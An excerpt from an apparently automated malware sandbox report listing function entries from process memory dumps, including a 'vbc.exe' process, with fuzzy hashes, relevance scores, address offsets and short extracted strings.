Opcode Fuzzy Hash: 956108a67e239f888f694a24d29f56bdc21c214fda18e283719bc0cf6cdab435
Instruction Fuzzy Hash: 51813D78A08219CFCB45CFA9D8808ADBBF9FF4A300B249559E819EB715D734D942CF44

Uniqueness

Uniqueness Score: -1.00%

Function 00324018, Relevance: .2, Instructions: 177COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2158403551.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3461a6e2b8bf876e0e6c8c7a99ec2adb1e1f581ea6d9d0b8b58e1f9e5e217ad2
Instruction ID: b91fe1c12ec3b42ae8330395bee8475125aaae5832dee5449ee749caa2d2f9cd
Opcode Fuzzy Hash: 3461a6e2b8bf876e0e6c8c7a99ec2adb1e1f581ea6d9d0b8b58e1f9e5e217ad2
Instruction Fuzzy Hash: 177121B4E05258CFCB05DFA9E848AAEBBF6FF89300F10816AD406AB355DB345945CF91

Uniqueness

Uniqueness Score: -1.00%

Function 00329687, Relevance: .2, Instructions: 168COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2158403551.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b07f4095305e8e4e7661eed1a172d1d3e2708efab50915e590b3dccfd2f00196
Instruction ID: 01430d60e222754efe4045b69867967a2fdf4cf8aea5748c9873c76697c08437
Opcode Fuzzy Hash: b07f4095305e8e4e7661eed1a172d1d3e2708efab50915e590b3dccfd2f00196
Instruction Fuzzy Hash: BB514374D19228DFDB02CFA9E884BEDBBB9BF4A310F24906BD015A7691C3744A85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 00324038, Relevance: .2, Instructions: 161COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2158403551.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ccae4a1baf9074be8898197ce53ebe529b424c45dd1cbbc0254c59a813d87f5
Instruction ID: 775162aff21b31154cd0bc8a1009168c7c41e3d21e714301bfbd649540e45805
Opcode Fuzzy Hash: 3ccae4a1baf9074be8898197ce53ebe529b424c45dd1cbbc0254c59a813d87f5
Instruction Fuzzy Hash: C861D3B4D04218CFDB04DFA9E948AAEBBF6FF88301F20812AD516A7754DB345945CF90

Uniqueness

Uniqueness Score: -1.00%

Function 0032CB80, Relevance: .1, Instructions: 145COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2158403551.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 036fea830d55da0bd32281b76ee18d314e24d381e1c415726e7f63003ee480c3
Instruction ID: 073f99decc26e2d18935be6e132563f636fa1f6ddcdf55eef6cb231cbf54f7fd
Opcode Fuzzy Hash: 036fea830d55da0bd32281b76ee18d314e24d381e1c415726e7f63003ee480c3
Instruction Fuzzy Hash: CC514774E15219CFCB05DFA9D8809EEBBB2FF89300B209869D405AB364DB359D42CF91

Uniqueness

Uniqueness Score: -1.00%

Function 0032AF6F, Relevance: .1, Instructions: 134COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2158403551.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2011317d402f466637c3320c5436ead2401194302d7ff5e34dc2eb8584fe576d
Instruction ID: 614311f424bf904d45acfb85d566982708f8aed0ea8cf89791fc2a3bccfdf54c
Opcode Fuzzy Hash: 2011317d402f466637c3320c5436ead2401194302d7ff5e34dc2eb8584fe576d
Instruction Fuzzy Hash: 365148B4D0962ADBCB02CF98E980AEEF7BAFF89300F21C515D519B7201D734A946CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00320559, Relevance: .1, Instructions: 85COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2158403551.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 087e29035e243e03866bdfc093f24ae70dab35508268ef7e938496cd56706c26
Instruction ID: bde061525c71998c198a98b18548ef936c91aa79a9543237d9c96df01279c94c
Opcode Fuzzy Hash: 087e29035e243e03866bdfc093f24ae70dab35508268ef7e938496cd56706c26
Instruction Fuzzy Hash: A0313674D0020D8FDB05EFA4D991AEEBBB6EF88304F218429D515773A5DB382945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00320568, Relevance: .1, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2158403551.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 667e3f2d52fcd257b434a12261408dc782fd507b474bef433001fc2c575166e8
Instruction ID: 6f72dc3c0e792f6c180874c40aa05a2b56074d11d2b893b2d9a0e153cb97c950
Opcode Fuzzy Hash: 667e3f2d52fcd257b434a12261408dc782fd507b474bef433001fc2c575166e8
Instruction Fuzzy Hash: 61311778D0011D8BDB04EFA4D990AEEB7B6FF88304F208528D515773A4DB382945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 002CD01C, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2158388150.00000000002CD000.00000040.00000001.sdmp, Offset: 002CD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dd3b0103726e6803cb5ce5ae60e58f2bcbeaf6782a486df2284e169c7441b1e2
Instruction ID: 8ce39db2138537ab567909d914428939ffee09df98bfd9aea6146059f21df3bb
Opcode Fuzzy Hash: dd3b0103726e6803cb5ce5ae60e58f2bcbeaf6782a486df2284e169c7441b1e2
Instruction Fuzzy Hash: B121F275614244DFCB14DF28D884F26BBA5FB84314F24CABDD80A4B246C377D857CAA1

Uniqueness

Uniqueness Score: -1.00%

Function 00326510, Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2158403551.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 41d833159416e7ccbc6155656d10faed2f2c27700f8e27958c84a985cf2b2e75
Instruction ID: a19d10862913c6bcf39116076ae9a8f50fb05cb85719f63a27fb662d261a8ecb
Opcode Fuzzy Hash: 41d833159416e7ccbc6155656d10faed2f2c27700f8e27958c84a985cf2b2e75
Instruction Fuzzy Hash: 2A216A74D0D398AFCB13CBB4A8655ACBFB0AF47200F2581DBD888D7296D6355A09CF52

Uniqueness

Uniqueness Score: -1.00%

Function 002CD006, Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2158388150.00000000002CD000.00000040.00000001.sdmp, Offset: 002CD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ee0a38167c25485f993c827eb3ef2751d4a9512e6afaf8826cdfe65f8b0f920a
Instruction ID: 3dc5a955297a7c0d4077971ebd35e9916dfe91aec6c7227ddda847de8acad943
Opcode Fuzzy Hash: ee0a38167c25485f993c827eb3ef2751d4a9512e6afaf8826cdfe65f8b0f920a
Instruction Fuzzy Hash: 122162755087809FCB02CF24D994B15BFB1EB46314F28C6EAD8498F657C33AD85ACB62

Uniqueness

Uniqueness Score: -1.00%

Function 00328298, Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2158403551.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a5210d406003a028cd05bac2ed3a18c675b91aee68ae0ffdb703762b3abf2258
Instruction ID: c3b014dd767def59605007e5a6bed842ff88a113a1c4920bcdb4d9e11942a904
Opcode Fuzzy Hash: a5210d406003a028cd05bac2ed3a18c675b91aee68ae0ffdb703762b3abf2258
Instruction Fuzzy Hash: AA212878E102089FCB44EFA8D8849EDBBF2FF88305F108469D519A7354DB346A41CF61

Uniqueness

Uniqueness Score: -1.00%

Function 00329510, Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2158403551.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 848c7d19a4415d5cb0e3d868f5d93b66beb33f284820177dd3c16206bbad19b1
Instruction ID: 4a7f613fc3e199a1c3379a2bc75ee1983a455e370dcb8bebef2fb3c464a20af5
Opcode Fuzzy Hash: 848c7d19a4415d5cb0e3d868f5d93b66beb33f284820177dd3c16206bbad19b1
Instruction Fuzzy Hash: F6215B74E092199FCB51DFA4C8409EEBFB1FF4A310F2046AAC415A7391D7309A85CF91

Uniqueness

Uniqueness Score: -1.00%

Function 00320498, Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2158403551.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 439da372b89ac46b66870f1511da2cfdb5d26d832bde964c4d4e7fed3b4d4891
Instruction ID: 6ce39cc7b8d55b7563e2fd954e751f27d0ce2d0a5c68a8dd010353aa44a6c812
Opcode Fuzzy Hash: 439da372b89ac46b66870f1511da2cfdb5d26d832bde964c4d4e7fed3b4d4891
Instruction Fuzzy Hash: 21211C30D14248AFDB45DFA9D458ADDBBF1EF89304F15C2E9D408AB262DB305A89CF51

Uniqueness

Uniqueness Score: -1.00%

Function 003200BC, Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2158403551.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b2aec897a78d86dcf7e2aa3378faf71748cb58833acc4e2f5bd81eff7329f131
Instruction ID: 8c5ff85b4a6e9c2cb9cbbd1042181ffd1acb476e06918f3b3c5f868bd34683e8
Opcode Fuzzy Hash: b2aec897a78d86dcf7e2aa3378faf71748cb58833acc4e2f5bd81eff7329f131
Instruction Fuzzy Hash: A6113A30D14209AFCB44EFA9D448AEDBBF5EF89314F55C6B9D508A7221DB306A84CF80

Uniqueness

Uniqueness Score: -1.00%

Function 00325A78, Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2158403551.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 127d4a861d5a2b4b78365a4d3a415c6265c87891d5517ae0fc45eb023bb5aa25
Instruction ID: 32f898381c59907a98b56d9151add7281cd743c5e23b99d33bca6f463ea31505
Opcode Fuzzy Hash: 127d4a861d5a2b4b78365a4d3a415c6265c87891d5517ae0fc45eb023bb5aa25
Instruction Fuzzy Hash: 40119E7581D3C89FCB13CBB49865599BFB49F06200F1942DFC44ADB2A3E6358A45CB92

Uniqueness

Uniqueness Score: -1.00%

Function 002BD1C1, Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2158378443.00000000002BD000.00000040.00000001.sdmp, Offset: 002BD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a82bf1e3139bf8ec10e0e67671a43534377a78d61e10793b03eb7b45e631683d
Instruction ID: c8d0557f86225cdcdfd6038f852a21bafaeef16309697a93bc0b7f6136205239
Opcode Fuzzy Hash: a82bf1e3139bf8ec10e0e67671a43534377a78d61e10793b03eb7b45e631683d
Instruction Fuzzy Hash: D401A7350247849BEB208E66CC84BE7BB9CEF513A4F18C41AED481A287D378DC40C7B1

Uniqueness

Uniqueness Score: -1.00%

Function 003277E2, Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2158403551.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b15739f5ec79f4458606820025948c39aac03b137d946ed155a0a597ffe3dfef
Instruction ID: 0cee1dae4e9cbbd67107a91c0824c2ceaeb1c6bc81f46ba588fd14894d0d6c92
Opcode Fuzzy Hash: b15739f5ec79f4458606820025948c39aac03b137d946ed155a0a597ffe3dfef
Instruction Fuzzy Hash: E411D7B4D0A619DFDB08CFAAE8446EDBBFABBC9300F20D16AD519A7254E73406419F10

Uniqueness

Uniqueness Score: -1.00%

Function 002BD1C0, Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2158378443.00000000002BD000.00000040.00000001.sdmp, Offset: 002BD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 599d02f0cb1e929e3276d1d52b2b038b183c18fe8bc62aaa929f412b9a3657a9
Instruction ID: a7c48a592bb44122997f8c836a994fd0e2b12e3843ed5f1a5a5c0950f2133fcb
Opcode Fuzzy Hash: 599d02f0cb1e929e3276d1d52b2b038b183c18fe8bc62aaa929f412b9a3657a9
Instruction Fuzzy Hash: D4F0AF72004384AAEB108E05D888BA6FF98EB91364F18C45AED481A282D2789C44CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00325B08, Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2158403551.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d09e12dddf06b0826d477ad75fa8141886d8fd823c05f0ec75a76fa17415ccfe
Instruction ID: befbcd924ae874b6a62bba119fa7d970e270027d631f3cb28ee33ec4625c16e4
Opcode Fuzzy Hash: d09e12dddf06b0826d477ad75fa8141886d8fd823c05f0ec75a76fa17415ccfe
Instruction Fuzzy Hash: E8F03474D09348AFCB52CFA8D85469CBFB0EB4A301F1480EAD888A7352D6316A05CF55

Uniqueness

Uniqueness Score: -1.00%

Function 00323798, Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2158403551.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 87db134b8248a751c261a04413b067666f1bd1dd6d157bc0bf334d5e8f564799
Instruction ID: 58aa403f698d7f8635de85dc4dccd2b6b021a1b85df7db9a7e7a00c494fb6927
Opcode Fuzzy Hash: 87db134b8248a751c261a04413b067666f1bd1dd6d157bc0bf334d5e8f564799
Instruction Fuzzy Hash: 56F08C75A49208AFCF02DFE4D85889DBFB4EF16720F10819AE80557361D3308E44EB12

Uniqueness

Uniqueness Score: -1.00%

Function 00320448, Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2158403551.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c95112940fa00276bbc21d3770d50b7004b775742650312a7eec3fe4c511e60
Instruction ID: d63b93858f0bcc2f561d123695be44dfedaa5eb2935420d59a1ce2a48196cf00
Opcode Fuzzy Hash: 6c95112940fa00276bbc21d3770d50b7004b775742650312a7eec3fe4c511e60
Instruction Fuzzy Hash: 9DE04F319512089BCB18FFF4D816A6EB6A9DF52209F1059BC850AA3252DF358E00DA56

Uniqueness

Uniqueness Score: -1.00%

Function 00325768, Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2158403551.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f85333acfcf9da45d4f5ad65066a16ab2efe3aa9561408a01b12033fa2b57526
Instruction ID: a650569aa93d42002cb60a37ec740add1ba1917af99255ec3135a6280dcdff35
Opcode Fuzzy Hash: f85333acfcf9da45d4f5ad65066a16ab2efe3aa9561408a01b12033fa2b57526
Instruction Fuzzy Hash: 5BF06D34809384AFDB02DBB4A95099DBFB0AB5B205F1581DEC84997353C6315E4ACB52

Uniqueness

Uniqueness Score: -1.00%

Function 003257E0, Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2158403551.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 880cd0ac7ac69acb14bf819b9884499534fe34c75953261260cb495ceee27ded
Instruction ID: 622ef53463c441350df813f5aaaed93a71db9c681f7c5a85b97cc1f177f9eb80
Opcode Fuzzy Hash: 880cd0ac7ac69acb14bf819b9884499534fe34c75953261260cb495ceee27ded
Instruction Fuzzy Hash: D9E03270D00208AFCB40DFE8E819A9DBBB0AB45701F0080AAD848A3250D6706A00CF86

Uniqueness

Uniqueness Score: -1.00%

Function 003272E0, Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2158403551.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f537504fed376f343ae443d1f30f35f8c5cc4d0605069df7b93668ff23937c87
Instruction ID: a5036ef5054cf99527a3aa787cf6d6cb76bbe2bb54849e9d82df26ddacc60258
Opcode Fuzzy Hash: f537504fed376f343ae443d1f30f35f8c5cc4d0605069df7b93668ff23937c87
Instruction Fuzzy Hash: C2F01E30D04208EFCB01DFA8D844A9DBBB4EB88310F2081AAE908A3300D631AA54DF85

Uniqueness

Uniqueness Score: -1.00%

Function 0032720C, Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2158403551.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d133a616aea838f6f85c1a862969c8a6dbabcee69425dce26d2fcdb9c1295601
Instruction ID: e2a199722489130190de81c064934642d64ea7cf0993516cb470a0fa9f28edae
Opcode Fuzzy Hash: d133a616aea838f6f85c1a862969c8a6dbabcee69425dce26d2fcdb9c1295601
Instruction Fuzzy Hash: F6E0C234E00208AFCB84DFE8E94569DFBF4EB88304F10C4AAD818A3341D631AA02CF81

Uniqueness

Uniqueness Score: -1.00%

Function 00324298, Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2158403551.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 60c75061092fcd1f6500a62a2f309eb82dc2e7b9871f6d9f0a4e270b978d3eb1
Instruction ID: 3fc5a47425c7083b9f53758f2971754e6eeef6f60b5c39ba64b8ecdbce48002a
Opcode Fuzzy Hash: 60c75061092fcd1f6500a62a2f309eb82dc2e7b9871f6d9f0a4e270b978d3eb1
Instruction Fuzzy Hash: 58E0DF36805288DFC711CFF9A818ADE7BB5EB46302F0046EED40AA7161DB300A40EF52

Uniqueness

Uniqueness Score: -1.00%

Function 003237A8, Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2158403551.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3fa0d6f339c9bc29bf5e3882606364d4ba01b6005a515a60d3df383b1740b24
Instruction ID: 026aa3df6321255aa2f5884c74ba3664d2b9c9dc7863bd54490b779ea1781a8c
Opcode Fuzzy Hash: a3fa0d6f339c9bc29bf5e3882606364d4ba01b6005a515a60d3df383b1740b24
Instruction Fuzzy Hash: C3E04F34900208EFCB44EF94D844D9DBBB5FF49711F108198EC0817320C7319E50DB41

Uniqueness

Uniqueness Score: -1.00%

Function 00326566, Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2158403551.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b5528abb79e8e3484f9c24c0adec37617d953d0e71aef87751099b9835f5c2f3
Instruction ID: 097928567e892e8b8ab489803f365ae16d8e3128cf4eb96d42f33b18f048bd6e
Opcode Fuzzy Hash: b5528abb79e8e3484f9c24c0adec37617d953d0e71aef87751099b9835f5c2f3
Instruction Fuzzy Hash: CAE0EC7091030CEFCB44EFF8A84569DBBB4AB04605F6144A9D90897740E7315A91CB91

Uniqueness

Uniqueness Score: -1.00%

Function 003242A0, Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2158403551.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 59c839a359a8887fd4ef4cf675dffc3379801e348ff46121a81c9a6582f7e3a5
Instruction ID: a067df18a63367e60748c1e4e077dd649e494b1f2e985e0c741c38f3de172c23
Opcode Fuzzy Hash: 59c839a359a8887fd4ef4cf675dffc3379801e348ff46121a81c9a6582f7e3a5
Instruction Fuzzy Hash: 0ED01271810208EFC701DFE5E909ADE77F9DB46706F0045A9950997650EB710A509B92

Uniqueness

Uniqueness Score: -1.00%

Function 00325AD0, Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2158403551.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 796b3f4dc0ac640dc5cd34a1f7623c63f6e696a7d87110549176feceee3596f6
Instruction ID: a08b96a0a0d15fc13399615c8b1ce003cd25937b8ca3d99af65dfb3d424ce9b0
Opcode Fuzzy Hash: 796b3f4dc0ac640dc5cd34a1f7623c63f6e696a7d87110549176feceee3596f6
Instruction Fuzzy Hash: EED0C73180020CAFC702EBE1A806ADEB3AD9B05200F1041BAC50883210EA310B009B82

Uniqueness

Uniqueness Score: -1.00%

Function 00325B8E, Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2158403551.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: af9bb347b7f642d3c695e0c0b81b266e26de38055695279c0da9bbd079c84a85
Instruction ID: caf97237bc856f0025c3e9198501232a144f3393a77dee86f93539218a1ed428
Opcode Fuzzy Hash: af9bb347b7f642d3c695e0c0b81b266e26de38055695279c0da9bbd079c84a85
Instruction Fuzzy Hash: 0CE0EC31910218EFCB40DFE8E84969DBBB4AB04606F2044A9D808A3350EA705A40CB41

Uniqueness

Uniqueness Score: -1.00%

Function 003224A0, Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2158403551.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f6ed7217f7569ef5fe190f1e42c64704e6e4ddab10afb002bc2e052acba1c5e4
Instruction ID: 9c18bcb1d180be6093c2467f7efb8e7003fadbcbaac898222dd2511d81ee6370
Opcode Fuzzy Hash: f6ed7217f7569ef5fe190f1e42c64704e6e4ddab10afb002bc2e052acba1c5e4
Instruction Fuzzy Hash: 97D0172205E7D04FC30327B06C2C7643F648F13612F0A05DAC84A871B392140848C722

Uniqueness

Uniqueness Score: -1.00%

Function 00326568, Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2158403551.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4e2059a062e15de2e53942503ca9d267804ecd816e6a2b3ebed9e1c2ff79a88
Instruction ID: cc2cd88351b01078fd29b1c7cd505cf068cf702f83d633c1c3efd04aa32f50ac
Opcode Fuzzy Hash: a4e2059a062e15de2e53942503ca9d267804ecd816e6a2b3ebed9e1c2ff79a88
Instruction Fuzzy Hash: F6E0E27091030CEFCB44EFF8A8456ADBBB4AB0460AF6140A9C90897740EB319A91CB91

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 01142F28, Relevance: 5.3, Strings: 3, Instructions: 1585COMMON

Download Yara Rule

Strings

TVGm, xrefs: 01142FC0
@2Gm, xrefs: 01142FFE
r-, xrefs: 0114385C

Memory Dump Source

Source File: 00000004.00000002.2159040535.0000000001140000.00000040.00000001.sdmp, Offset: 01140000, based on PE: false

Similarity

API ID:
String ID: r-$@2Gm$TVGm
API String ID: 0-3395463217
Opcode ID: 3f3372e2d5742da7dbb04600b61631dc53a3a7e5d7f5ce2e24e682d107236808
Instruction ID: 2a7588d6ce730ccbb3ef8aa08c598231add65f58fea02fd36ab5ab765c09fa2f
Opcode Fuzzy Hash: 3f3372e2d5742da7dbb04600b61631dc53a3a7e5d7f5ce2e24e682d107236808
Instruction Fuzzy Hash: 44F25E7A510214EFCB468F94D948D55BBB2FF4D324B0A81D4E60A9F232C736E9A1EF50

Uniqueness

Uniqueness Score: -1.00%

Function 003242E8, Relevance: 1.4, Strings: 1, Instructions: 164COMMON

Download Yara Rule

Strings

@2Gm, xrefs: 0032450A

Memory Dump Source

Source File: 00000004.00000002.2158403551.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false

Similarity

API ID:
String ID: @2Gm
API String ID: 0-293892856
Opcode ID: 4ff329125563813bcdbf56f65b843b1c0a9282f028029f63ae27bd45e9c64b6e
Instruction ID: 23f6ec4e2f2cfb3b9f7adca1350bc5e16f0dcf37c35ffa35e52b24f26952b371
Opcode Fuzzy Hash: 4ff329125563813bcdbf56f65b843b1c0a9282f028029f63ae27bd45e9c64b6e
Instruction Fuzzy Hash: 10611A70A102488BDB58EFBAE855A9E7BF3AFC8304F04C939D4059F268EF7459058B91

Uniqueness

Uniqueness Score: -1.00%

Function 00326AF0, Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2158403551.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ec3a012682c6fbeeabad2d7a570abb7b0427472120b32e782358246efccd5659
Instruction ID: 67ff0ffc7e4ee0bee901c8a64974c640cd49296ffa0dfd640742873545633413
Opcode Fuzzy Hash: ec3a012682c6fbeeabad2d7a570abb7b0427472120b32e782358246efccd5659
Instruction Fuzzy Hash: 09215E71E042A89FDB19CF6AE8446D9BBB6AFCA300F14C0FAD448AB215D7311945CF52

Uniqueness

Uniqueness Score: -1.00%

Function 00329F60, Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2158403551.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae07cae098afbc8575d379b5dbf01973544dd508ea2ff17b6eac96b3969bc420
Instruction ID: 9dcdc3bb06fdd646a280e817ea0bc3a778eab4bae360f75f086b7346cc331e69
Opcode Fuzzy Hash: ae07cae098afbc8575d379b5dbf01973544dd508ea2ff17b6eac96b3969bc420
Instruction Fuzzy Hash: D411D771E046189BEB49CFABE8401EEFAF7AFC9300F14D03AD815AA265DB3045428F55

Uniqueness

Uniqueness Score: -1.00%

Function 00329F68, Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2158403551.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 27a62748d9d1bb278a7a573a5ab0f571b4ac6dc4d184d8495bc04c94294a1d58
Instruction ID: 90fa267078b471d9ec931153f68302b41e81ed219c590efb4cc59f5613812aac
Opcode Fuzzy Hash: 27a62748d9d1bb278a7a573a5ab0f571b4ac6dc4d184d8495bc04c94294a1d58
Instruction Fuzzy Hash: 1E11DA71E046189BDB49CFABE9402EEFAF7AFC9301F14D03AD919B6224EB3045418F55

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: vbc.exe PID: 960 Parent PID: 2688 vbc.exeCOMMON

Executed Functions

Function 049F9B5A, Relevance: 8.0, APIs: 1, Strings: 3, Instructions: 952COMMON

Download Yara Rule

Strings

gsb, xrefs: 049FA7B1
48Gm, xrefs: 049F9B87
@!Z, xrefs: 049FAD43

Memory Dump Source

Source File: 00000005.00000002.2369239007.00000000049E0000.00000040.00000001.sdmp, Offset: 049E0000, based on PE: false

Similarity

API ID:
String ID: 48Gm$@!Z$gsb
API String ID: 0-3444485991
Opcode ID: 5ddfe513000aeb0270f23c2cf6c8ee35862b3c6b2567eee8e5029b5ce44fd734
Instruction ID: 0407266cc25e5f32b84f0c9ebfabe79bdfee93dd43d069ea103e8e108dcf1cc7
Opcode Fuzzy Hash: 5ddfe513000aeb0270f23c2cf6c8ee35862b3c6b2567eee8e5029b5ce44fd734
Instruction Fuzzy Hash: D8925B34A04219CFCB69DF64CC947ADB7B6BB89304F1089E9D50AAB354DB34AE81CF50

Uniqueness

Uniqueness Score: -1.00%

Function 00CACFB8, Relevance: 5.2, Strings: 4, Instructions: 205COMMON

Download Yara Rule

Strings

pV, xrefs: 00CAD1AF
48Gm, xrefs: 00CAD0EB
X, xrefs: 00CACFF1
48Gm, xrefs: 00CAD173

Memory Dump Source

Source File: 00000005.00000002.2368332551.0000000000CA0000.00000040.00000001.sdmp, Offset: 00CA0000, based on PE: false

Similarity

API ID:
String ID: 48Gm$48Gm$pV$X
API String ID: 0-412854834
Opcode ID: 06f72d12f7815f33fe640b993552df1964dcec45bf0bbfad7898cfe374615cdf
Instruction ID: 4080a2a24eef62efabd481afcddb84d78dd0e7880b7bae73d382a2d1688be3c1
Opcode Fuzzy Hash: 06f72d12f7815f33fe640b993552df1964dcec45bf0bbfad7898cfe374615cdf
